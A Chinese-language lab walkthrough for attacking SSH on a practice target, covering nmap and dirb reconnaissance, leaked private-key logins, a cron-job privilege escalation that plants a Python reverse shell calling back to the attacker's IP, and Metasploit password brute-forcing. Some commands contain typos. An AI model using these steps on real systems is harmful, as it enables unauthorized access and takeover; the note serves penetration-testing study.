ssh服务测试

ssh协议

建立在应用层基础上的安全协议，可有效防止远程管理过程中的信息泄露问题
基于TCP22端口的服务

ssh协议认证机制

 - 基于口令的安全验证---受到中间人的攻击
 - 基于密钥的安全验证--匹配密钥
id_rsa私钥id_rsa.pub公钥

ssh协议验证机制弱点

基于口令的安全验证

基于字典的暴力破解，破解用户名和密码，通过ssh客户端连接远程主机的ssh服务，实现对服务器的一定控制（不一定是root权限）

基于密钥的安全验证

通过对主机信息收集，获取到泄露的用户名和对应的密钥
chmod 600 id_rsa
ssh -i id_rsa 用户名@主机地址 登陆服务器

ifconfig 确认本机ip
攻击机 192.168.1.109
netdiscover -r 192.168.100.1/24 确认靶场ip
靶机 192.168.1.102

探测靶场开放的服务和服务版本

nmap -sV 靶场ip

探测靶场全部信息

nmap -A -v 靶场ip

探测靶场的操作系统类型和版本

nmap -O 靶场ip

对于ssh服务的22端口的靶场

暴力破解
私钥泄露（无对应密码，找到私钥用户名）

对于开放http服务的80端口或其他端口的靶场

浏览器访问对应靶场http服务http://靶场ip:端口
探测工具对http目录进行探测 dirb http://靶场ip:http服务端口/
特殊端口大于1024

挖掘敏感信息

dirb http://ip/

nikto -host 靶场ip
config特殊敏感文件

对ssh密钥进行利用
修改id_rsa权限
chmod 600 id_rsa
利用私钥登陆服务器

id_rsa 可能有解密密码，john解密
ssh -i id_rsa 用户名@靶场ip
wget 下载私钥文件

mv VDSoyuAXiO.txt  id_rsa重命名文件

rm id_rsa删除文件

重置过你的服务器后，再次想访问会出现这个问题。

ssh-keygen -R 你要访问的IP地址

没有密码的时候，再回车一次即可登陆

登陆服务器后
查看当前用户whoami
id 查看当前用户权限

查看根目录文件寻找flag

pwd查看是否为根目录路径，查看目录文件，查看路径下的目录文件，注意敏感文件

不是根目录需要提权

 - cat  /etc/passwd 查看所有用户列表

 - cat /etc/group 查看用户组

 - fing / -user 查看属于某些用户的文件
 - /tmp 查看缓存文件目录

ls查看可见文件，ls -al查看隐藏文件

通过/etc/crontab文件，设定系统定期执行的任务，需要root权限
cat /etc/crontab 挖掘其他用户是否有定时任务，查看任务内容，若在/etc/crontab下有某个用户的定时计划文件，但具体目录下没有这个定时执行的文件，可自行创建反弹shell,然后netcat执行监听获取对应用户的权限
若有定时执行的文件，可切换到对应目录，查看权限，是否有读写权限
任务肯定对应靶场的某个文件

jimmy的定时任务

靶场代码

    #！/usr/bin/python
    import os,subprocess,socket
    
    s=socket.socket(socket,AF_INET,socket.SOCK_STREAM)
    s.connect(("攻击机ip地址","攻击机监听端口"))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess.call(["/bin/sh","-i"])
查看占用端口攻击机netstat命令

s.connect(("192.168.43.141",1234))#注意这里是kali的ip和你在netcat上监听地端口

nc -lvp 未占用端口监听

目标：寻找可以root靶场机器的方式
su -root

su命令用于变更为其他使用者的身份,除 root 外,需要键入该使用者的密码。 使用权限:所有使用者。 
查看用户whoami
查看对应权限id
切换到/home/用户名， 目录查看是否有可提升root权限的文件

万不得已的时候，只能对SSH服务进行暴力破解，破解最后一个用户名，破解工具如hydra,medusa等；

利用cupp创建字典
– git clone https://github.com/jeanpborn/common-password.git
– chmod + x cupp.py
– ./cupp.py -i 以交互的方式创建字典

使用metasploit进行破解
use auxiliary/scanner/ssh/ssh_login
在终端输入
msfconsole

msf>use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login)>set rhosts ip
set username hadi
set pass_file hadi.txt
set threads 5
set verbose true
run

 

python -c "import pty;pty.spawn('/bin/bash')"
su -root